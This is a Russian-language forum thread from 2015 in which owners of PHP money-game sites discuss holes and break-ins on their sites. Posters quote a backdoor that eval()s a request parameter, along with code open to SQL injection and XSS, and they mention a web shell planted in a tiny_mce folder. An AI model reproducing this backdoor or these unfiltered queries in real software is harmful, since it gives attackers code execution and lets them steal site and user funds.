Дыры на сайтах

kvozimir · 9 Янв 2015

chelton085 написал(а):
И снова по теме - думается, актуально было бы обмениваться в сей теме про известные дыры на сайтах, которые есть кроме тех, что таятся в злосчастной папке тини мсе. А так же оговаривать методы их устранения. Не все же знают, как они могут в хтмл коде выглядеть. У меня вот, например, ай-болит ничего абсолютно больше не находит после того, как удалил код с die в конце строки. Но я далеко не уверен, что в моем скрипте не осталось дыр.

пока ты сам не научишься понимать php и не проверишь скрипт ручками,то у тебя сомнения так и будут

deadboy2 · 9 Янв 2015

помогите кто знает в чем проблема?! в корневой папке htacess не правильно работает!
То есть если пишу в него код какой нибудь то сайт не работает!Но и проблема в том что htaceess в под папках вобще не работает,то есть ставлю пароль на папку а ему хоть бы что не реагирует((( вот мой код с файла htacess который в главной директории:

DirectoryIndex index.php

RewriteEngine On

redirect /_vti_bin http://www.microsoft.com
redirect /scripts http://www.microsoft.com
redirect /MSADC http://www.microsoft.com
redirect /c http://www.microsoft.com
redirect /d http://www.microsoft.com
redirect /_mem_bin http://www.microsoft.com
redirect /msadc http://www.microsoft.com
RedirectMatch (.*)cmd.exe$ http://www.microsoft.com$1

# Основной домен
RewriteCond %{HTTP_HOST} ^www\.(.*) [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]

# Главная
RewriteRule ^index.html$ index.php [L]

# Правила
RewriteRule ^rules(/?)+$ index.php?menu=rules [L]

# Контакты
RewriteRule ^contacts(/?)+$ index.php?menu=contacts [L]

# Новости
RewriteRule ^news(/?)+$ index.php?menu=news [L]

# О нас
RewriteRule ^about(/?)+$ index.php?menu=about [L]

# Регистрация
RewriteRule ^signup/key/(.*)(/?)+$ index.php?menu=signup&key=$1 [L]
RewriteRule ^signup(/?)+$ index.php?menu=signup [L]

# Восстановление пароля
RewriteRule ^recovery(/?)+$ index.php?menu=recovery [L]

# Последние выплаты
RewriteRule ^payments(/?)+$ index.php?menu=payments [L]

# Пользователи
RewriteRule ^users/([0-9]+)(/?)+$ index.php?menu=users&page=$1 [L]
RewriteRule ^users(/?)+$ index.php?menu=users [L]

# Аккаунт
RewriteRule ^account/lottery/winners(/?)+$ index.php?menu=account&sel=lottery&winners [L]
RewriteRule ^account/lottery(/?)+$ index.php?menu=account&sel=lottery [L]
RewriteRule ^account/knb(/?)+$ index.php?menu=account&sel=knb [L]
RewriteRule ^account/chat(/?)+$ index.php?menu=account&sel=chat [L]
RewriteRule ^account/pay_points(/?)+$ index.php?menu=account&sel=pay_points [L]
RewriteRule ^account/donations(/?)+$ index.php?menu=account&sel=donations [L]

RewriteRule ^account/bonus(/?)+$ index.php?menu=account&sel=bonus [L]
RewriteRule ^account/bonus2(/?)+$ index.php?menu=account&sel=bonus2 [L]
RewriteRule ^account/set(/?)+$ index.php?menu=account&sel=set [L]

RewriteRule ^account/config(/?)+$ index.php?menu=account&sel=config [L]
RewriteRule ^account/insert(/?)+$ index.php?menu=account&sel=insert [L]
RewriteRule ^account/payment/([0-9]+)(/?)+$ index.php?menu=account&sel=payment&pay_id=$1 [L]
RewriteRule ^account/payment(/?)+$ index.php?menu=account&sel=payment [L]
RewriteRule ^account/market(/?)+$ index.php?menu=account&sel=market [L]
RewriteRule ^account/swap(/?)+$ index.php?menu=account&sel=swap [L]
RewriteRule ^account/store(/?)+$ index.php?menu=account&sel=store [L]
RewriteRule ^account/referals(/?)+$ index.php?menu=account&sel=referals [L]
RewriteRule ^account/farm(/?)+$ index.php?menu=account&sel=farm [L]
RewriteRule ^competition(/?)+$ index.php?menu=competition [L]
RewriteRule ^competition/list(/?)+$ index.php?menu=competition&list [L]
RewriteRule ^account/exit(/?)+$ index.php?menu=account&sel=exit [L]
RewriteRule ^account(/?)+$ index.php?menu=account [L]
RewriteRule ^account/donate(/?)+$ index.php?menu=account&sel=donate [L]
AddDefaultCharset WINDOWS-1251

chelton085 · 9 Янв 2015

kvozimir написал(а):
пока ты сам не научишься понимать php и не проверишь скрипт ручками,то у тебя сомнения так и будут

Да я бы лучше сам. конечно, проверял. Потому что хочешь сделать хорошо - сделай это сам. Ну, допустим, знаю, что искать eval , так же обращать внимание на то, где встречается die. ну а еще что? Кроме еще как кода64 вида 3ugjjgjjg56iyiyu6ppnn,56565 больше и не знаю, что может быть подозрительным. Да хотя бы знать конструкции функций правильный, основных, те что в дефолтном скрипте используются.

Andrey582 · 11 Янв 2015

PHP:

if(!empty($_REQUEST['stats'])){ if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die();}

Обнаружил такой код. Это что ? в Account/_statistics.php

Andrey582 · 11 Янв 2015

Вот такая ерунда в payeer_merchant.php . Стоит удалять ? Или это ошибся сканер?

kvozimir · 11 Янв 2015

Andrey582 написал(а):
Вот такая ерунда в payeer_merchant.php . Стоит удалять ? Или это ошибся сканер?

данный файл обработчик платежей в нем в принципе удалять ни чего не нужно

irakli_666 · 11 Янв 2015

deadboy2 написал(а):
помогите кто знает в чем проблема?! в корневой папке htacess не правильно работает!
То есть если пишу в него код какой нибудь то сайт не работает!Но и проблема в том что htaceess в под папках вобще не работает,то есть ставлю пароль на папку а ему хоть бы что не реагирует((( вот мой код с файла htacess который в главной директории:

DirectoryIndex index.php

RewriteEngine On

redirect /_vti_bin http://www.microsoft.com
redirect /scripts http://www.microsoft.com
redirect /MSADC http://www.microsoft.com
redirect /c http://www.microsoft.com
redirect /d http://www.microsoft.com
redirect /_mem_bin http://www.microsoft.com
redirect /msadc http://www.microsoft.com
RedirectMatch (.*)cmd.exe$ http://www.microsoft.com$1

# Основной домен
RewriteCond %{HTTP_HOST} ^www\.(.*) [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]

# Главная
RewriteRule ^index.html$ index.php [L]

# Правила
RewriteRule ^rules(/?)+$ index.php?menu=rules [L]

# Контакты
RewriteRule ^contacts(/?)+$ index.php?menu=contacts [L]

# Новости
RewriteRule ^news(/?)+$ index.php?menu=news [L]

# О нас
RewriteRule ^about(/?)+$ index.php?menu=about [L]

# Регистрация
RewriteRule ^signup/key/(.*)(/?)+$ index.php?menu=signup&key=$1 [L]
RewriteRule ^signup(/?)+$ index.php?menu=signup [L]

# Восстановление пароля
RewriteRule ^recovery(/?)+$ index.php?menu=recovery [L]

# Последние выплаты
RewriteRule ^payments(/?)+$ index.php?menu=payments [L]

# Пользователи
RewriteRule ^users/([0-9]+)(/?)+$ index.php?menu=users&page=$1 [L]
RewriteRule ^users(/?)+$ index.php?menu=users [L]

# Аккаунт
RewriteRule ^account/lottery/winners(/?)+$ index.php?menu=account&sel=lottery&winners [L]
RewriteRule ^account/lottery(/?)+$ index.php?menu=account&sel=lottery [L]
RewriteRule ^account/knb(/?)+$ index.php?menu=account&sel=knb [L]
RewriteRule ^account/chat(/?)+$ index.php?menu=account&sel=chat [L]
RewriteRule ^account/pay_points(/?)+$ index.php?menu=account&sel=pay_points [L]
RewriteRule ^account/donations(/?)+$ index.php?menu=account&sel=donations [L]

RewriteRule ^account/bonus(/?)+$ index.php?menu=account&sel=bonus [L]
RewriteRule ^account/bonus2(/?)+$ index.php?menu=account&sel=bonus2 [L]
RewriteRule ^account/set(/?)+$ index.php?menu=account&sel=set [L]

RewriteRule ^account/config(/?)+$ index.php?menu=account&sel=config [L]
RewriteRule ^account/insert(/?)+$ index.php?menu=account&sel=insert [L]
RewriteRule ^account/payment/([0-9]+)(/?)+$ index.php?menu=account&sel=payment&pay_id=$1 [L]
RewriteRule ^account/payment(/?)+$ index.php?menu=account&sel=payment [L]
RewriteRule ^account/market(/?)+$ index.php?menu=account&sel=market [L]
RewriteRule ^account/swap(/?)+$ index.php?menu=account&sel=swap [L]
RewriteRule ^account/store(/?)+$ index.php?menu=account&sel=store [L]
RewriteRule ^account/referals(/?)+$ index.php?menu=account&sel=referals [L]
RewriteRule ^account/farm(/?)+$ index.php?menu=account&sel=farm [L]
RewriteRule ^competition(/?)+$ index.php?menu=competition [L]
RewriteRule ^competition/list(/?)+$ index.php?menu=competition&list [L]
RewriteRule ^account/exit(/?)+$ index.php?menu=account&sel=exit [L]
RewriteRule ^account(/?)+$ index.php?menu=account [L]
RewriteRule ^account/donate(/?)+$ index.php?menu=account&sel=donate [L]
AddDefaultCharset WINDOWS-1251

попробуй редиректы убрать

thebest7777 · 13 Янв 2015

wh1skas написал(а):
Обычный хостинг, у меня от timeweb, все вери найс. У пользователя поменяй мыло, пароли. А если добавишь md5 на пароли, то взлетишь к успеху )) Соответственно, необходимо будет мудро убрать из базы столбец с оригинальными паролями.

Вискас не подскажешь как добавить md5 на пароли?

Rubrika · 14 Янв 2015

Как-то брал там вип, для проверки нескольких скриптов, часто выдает баги про фильтрацию, вискас скидывал статью для новичков (с хабрахаба).На том сканере как раз показывает эти уязвимости. Сканер рекомендую) Мне понравился, исправил пару подобных глюков на ферме )

Andrey582 написал(а):
Вот такая ерунда в payeer_merchant.php . Стоит удалять ? Или это ошибся сканер?

swerg · 22 Янв 2015

Код:

$this->db->Query('INSERT INTO `db_chat` (`user`, `to`, `comment`, `time`) VALUES ("'.$_SESSION["user"].'", "'.$this->db->RealEscape($to).'", "'.$this->db->RealEscape($_POST['comment']).'", "'.time().'")');

помогите исправить сканер показывает $_POST['comment'] SQL Injection!

kvozimir · 22 Янв 2015

swerg написал(а):
Код:

$this->db->Query('INSERT INTO `db_chat` (`user`, `to`, `comment`, `time`) VALUES ("'.$_SESSION["user"].'", "'.$this->db->RealEscape($to).'", "'.$this->db->RealEscape($_POST['comment']).'", "'.time().'")');

помогите исправить сканер показывает $_POST['comment'] SQL Injection!

Все норм

pin70 · 22 Янв 2015

Через какую вы программу все это вы проверяете?

thebest7777 · 23 Янв 2015

pin70 написал(а):
Через какую вы программу все это вы проверяете?

вот есть сервис проверяет на XSS, SQL Injection! http://find-xss.net/scanner/

nnodir · 23 Янв 2015

Здравствуйте! На проекте завелся вор. Кто то постоянно по несколько раз в день выводит у меня деньги на другой кошелек который не связан к аккаунте.Кошелек известен и все больше ни чего .
Может кто нибудь подскажет как можно заблокировать тот кошелек.

rus56 · 25 Янв 2015

wh1skas написал(а):
К сожалению, у этого скрипта есть изъян, который позволяет отключить в браузере JS и обойти эту уловку с запретом на использование ПКМ.
Есть несколько способов решения этой проблемы, сразу перейду к ним, только в совокупности это спасет Вас, а точнее Ваших пользователей от подмены кошелька мошенником:
1. Необходимо обрамить код заказа выплаты в javascript, а именно только таблицу с формой (<form> имеется ввиду).
2. Выводить в тегах <noscript> на сайте, что сайт не будет работать с отключенными JavaScript.

Соответственно, что мы имеем:

Посмотреть вложение 1085
Согласну анимашке, пользователь будет жмякать на кнопочки оформления заявки, заказывать выплату. Предположим, что кошелек привязан. Хацкер захочет сменить кошелек, посредством подмены через код страницы (элемента). ДжаваСкрипт запрещает использовать ПКМ. Хацкер отключает JS в браузере и пытается обойти запрет но:
1. Теперь он может юзать пкм на странице.
2. Кнопка оформления не сработает.
Ура? - УРА!

Ну все таки можно по подробнее!?

AriCosmo · 28 Янв 2015

wh1skas написал(а):
Кстати о tiny_mce. Я бы предложил Вам залочить папку от недоброжелателей. Есть шелл с баттн.пхп, который пихают в эту папку и снимают денюшку без вывода в статистику выплат. Там же найдете файл лицензии, который надо удалить. Залочить папку предлагаю при помощи .htaccess
Идем в хранилище: / js / editor / jscripts /
в эту папку заливаете файл .htaccess
Погуглив различные способы защиты при помощи.htaccess, выберите наиболее подходящие для Вас. У меня например требует логин и пароль, которые зашифрованы в корневой папке сайта, к которой ограничен доступ.

Как это можно сделать? Можно подробнее?
И ещё, если ли идеи по кодировки паролей в бд?

Rozario · 28 Янв 2015

Доброго времени суток!
Сейчас проверил на сканере выдало три уязвимости, хотелось бы подробней узнать что это?
1) /pages/account/_chat.php
<textarea name="ntext" cols="50" rows="3"><?=(isset($_POST["ntext"])) ? $_POST["ntext"] : false; ?></textarea><BR /

2) /pages/account/_referals.php
<img src="/img/piar-link.png" style="vertical-align:-2px; margin-right:5px;" /><font color="#000;">http://<?=$_SERVER['HTTP_HOS];T' ?>/?i=<?=$_SESSION["user_id"]; ?></font>

3) /pages/admin/_about.php
$db->Query("UPDATE db_conabrul SET about = '".$_POST["tx"]."' WHERE id = '1'");

Заранее благодарен

kvozimir · 28 Янв 2015

Rozario написал(а):
Доброго времени суток!
Сейчас проверил на сканере выдало три уязвимости, хотелось бы подробней узнать что это?
1) /pages/account/_chat.php
<textarea name="ntext" cols="50" rows="3"><?=(isset($_POST["ntext"])) ? $_POST["ntext"] : false; ?></textarea><BR /

2) /pages/account/_referals.php
<img src="/img/piar-link.png" style="vertical-align:-2px; margin-right:5px;" /><font color="#000;">http://<?=$_SERVER['HTTP_HOS];T' ?>/?i=<?=$_SESSION["user_id"]; ?></font>

3) /pages/admin/_about.php
$db->Query("UPDATE db_conabrul SET about = '".$_POST["tx"]."' WHERE id = '1'");

Заранее благодарен

фильтрация должна стоять

Олег Длиннов · 28 Янв 2015

у меня нету времени читать все посты. Нужно в каждую папку запихнуть файл .htaccess и прописать в него
deny from all ? или как? я дочитал до 3 страницы и так ничего и не понял

Sasdred · 28 Янв 2015

Всем доброго времени, ребята только что ломанули мой сайт и унесли все деньги, как они смогли зайти в админку и накинуть себе миллион золота? Помогите устранить ето.